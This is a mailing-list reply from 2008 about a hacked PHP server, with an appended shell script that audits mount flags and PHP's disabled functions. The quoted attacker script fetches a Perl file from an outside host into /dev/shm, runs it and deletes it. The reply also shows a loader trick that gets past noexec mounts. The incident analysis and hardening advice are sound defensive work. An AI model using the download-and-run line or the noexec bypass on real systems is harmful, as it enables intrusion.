On Jan 3, 2008 6:18 PM, Mike Wang <[EMAIL PROTECTED]> wrote:
> Hi folks

[snip]

> http://www.radiovirtual.org/bb.txt > bb.txt;perl bb.txt;rm -f bb.txt*');
> passthru('cd /dev/shm;GET http://www.radiovirtual.org/bb.txt > bb.txt;perl bb.txt;rm -f bb.txt*');
> passthru('id');
> ?>
>
> The /tmp was mounted as rw,noexec,nosuid, so it cannot run.

Nope. See below.

> But not the /dev/shm, so the hacked script downloaded to /dev/shm and ran
> from there.
>
> What kind of applications are using /dev/shm? I googled around but can't seem
> to find much information.
> Right now I mount it as rw,noexec,nosuid.

A lot of stuff does. /dev/shm is recommended by the LSB if I'm not mistaken. I know a few apps that use this (including my own).

Well done tracking this script kiddie. This is a very stupid hack.

By the way, noexec doesn't buy you anything here. "perl bb.txt" should've worked no matter if /tmp is exec or not. The way I see it, they both worked (/tmp and /dev/shm). And besides, noexec can't even stop executables anyway. That's the stupidest of flags for mount:

$> /lib/ld-linux.so.2 /usr/bin/printf "%s\n" foo
foo

And don't even think of making /lib/ld-linux.so.2 non-exec or something else... Your system will just break in a million pieces ;-)

It's time to tell PHP (via php.ini) not to allow any of those functions that allow executing stuff from the system (system, passthru, whatever). Also, you might want to consider using virtual servers (Linux VServer, Xen, VMware, etc.).

Hack me once, shame on you. Hack me any other time with the same stupid attack vector, shame on me.

Good that you took time to report this.

--
----)(-----
Luis Mondesi
Maestro Debiano

----- START ENCRYPTED BLOCK (Triple-ROT13) ------
Gur Hohagh [Yvahk] qvfgevohgvba oevatf gur fcvevg bs Hohagh gb gur fbsgjner jbeyq.
----- END ENCRYPTED BLOCK (Triple-ROT13) ------
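An added example, not code from either poster, that audits the two defences the reply talks about: the mount flags on /tmp and /dev/shm, and PHP's disable_functions list. It assumes POSIX sh with awk, sed, grep and tr; the nodev flag and the set of PHP functions checked are this example's choices, and the php.ini location is distribution-specific.

```shell
#!/bin/sh
# Added example, not from the thread: audit the two controls discussed,
# mount flags on /tmp and /dev/shm, and PHP's disable_functions list.
# Both checks take file contents as a string so they run offline on the
# constructed samples below; on a host pass "$(cat /proc/mounts)" and the
# contents of your php.ini (its path varies by distribution, an assumption).

# check_mount_opts MOUNTS_TEXT MOUNTPOINT: prints the hardening flags missing
# from the mount (4th field of /proc/mounts); returns 0 only if none are.
check_mount_opts() {
    mounts=$1; mp=$2; missing=""
    opts=$(printf '%s\n' "$mounts" | awk -v mp="$mp" '$2 == mp { o = $4 } END { print o }')
    if [ -z "$opts" ]; then
        echo "$mp: not a separate mount"; return 1
    fi
    for want in noexec nosuid nodev; do   # nodev goes beyond the thread
        case ",$opts," in
            *",$want,"*) ;;
            *) missing="$missing $want" ;;
        esac
    done
    if [ -n "$missing" ]; then
        echo "$mp: missing$missing"; return 1
    fi
    echo "$mp: ok"
}

# check_php_disable INI_TEXT: prints the shell-spawning PHP functions that
# disable_functions does not cover; returns 0 only if all are disabled.
check_php_disable() {
    ini=$1; missing=""
    line=$(printf '%s\n' "$ini" | sed -n 's/^[[:space:]]*disable_functions[[:space:]]*=//p' | tail -n 1)
    disabled=$(printf '%s' "$line" | tr -d ' \t' | tr ',' '\n')
    for fn in system passthru exec shell_exec popen proc_open; do
        printf '%s\n' "$disabled" | grep -qx "$fn" || missing="$missing $fn"
    done
    if [ -n "$missing" ]; then
        echo "php: not disabled:$missing"; return 1
    fi
    echo "php: ok"
}

# Constructed samples modelled on the thread: /tmp hardened, /dev/shm not,
# and a php.ini that forgot passthru, the function the dropped script used.
SAMPLE_MOUNTS='/dev/sda1 / ext3 rw,relatime 0 0
tmpfs /tmp tmpfs rw,nosuid,noexec,nodev 0 0
tmpfs /dev/shm tmpfs rw 0 0'
SAMPLE_INI='; constructed php.ini fragment
disable_functions = system, exec, shell_exec, popen, proc_open'
```

Run the two functions against the samples (or real file contents) and act on any non-zero exit; as the reply notes, the mount flags alone would not have stopped "perl bb.txt", so the PHP check is the one that matters most.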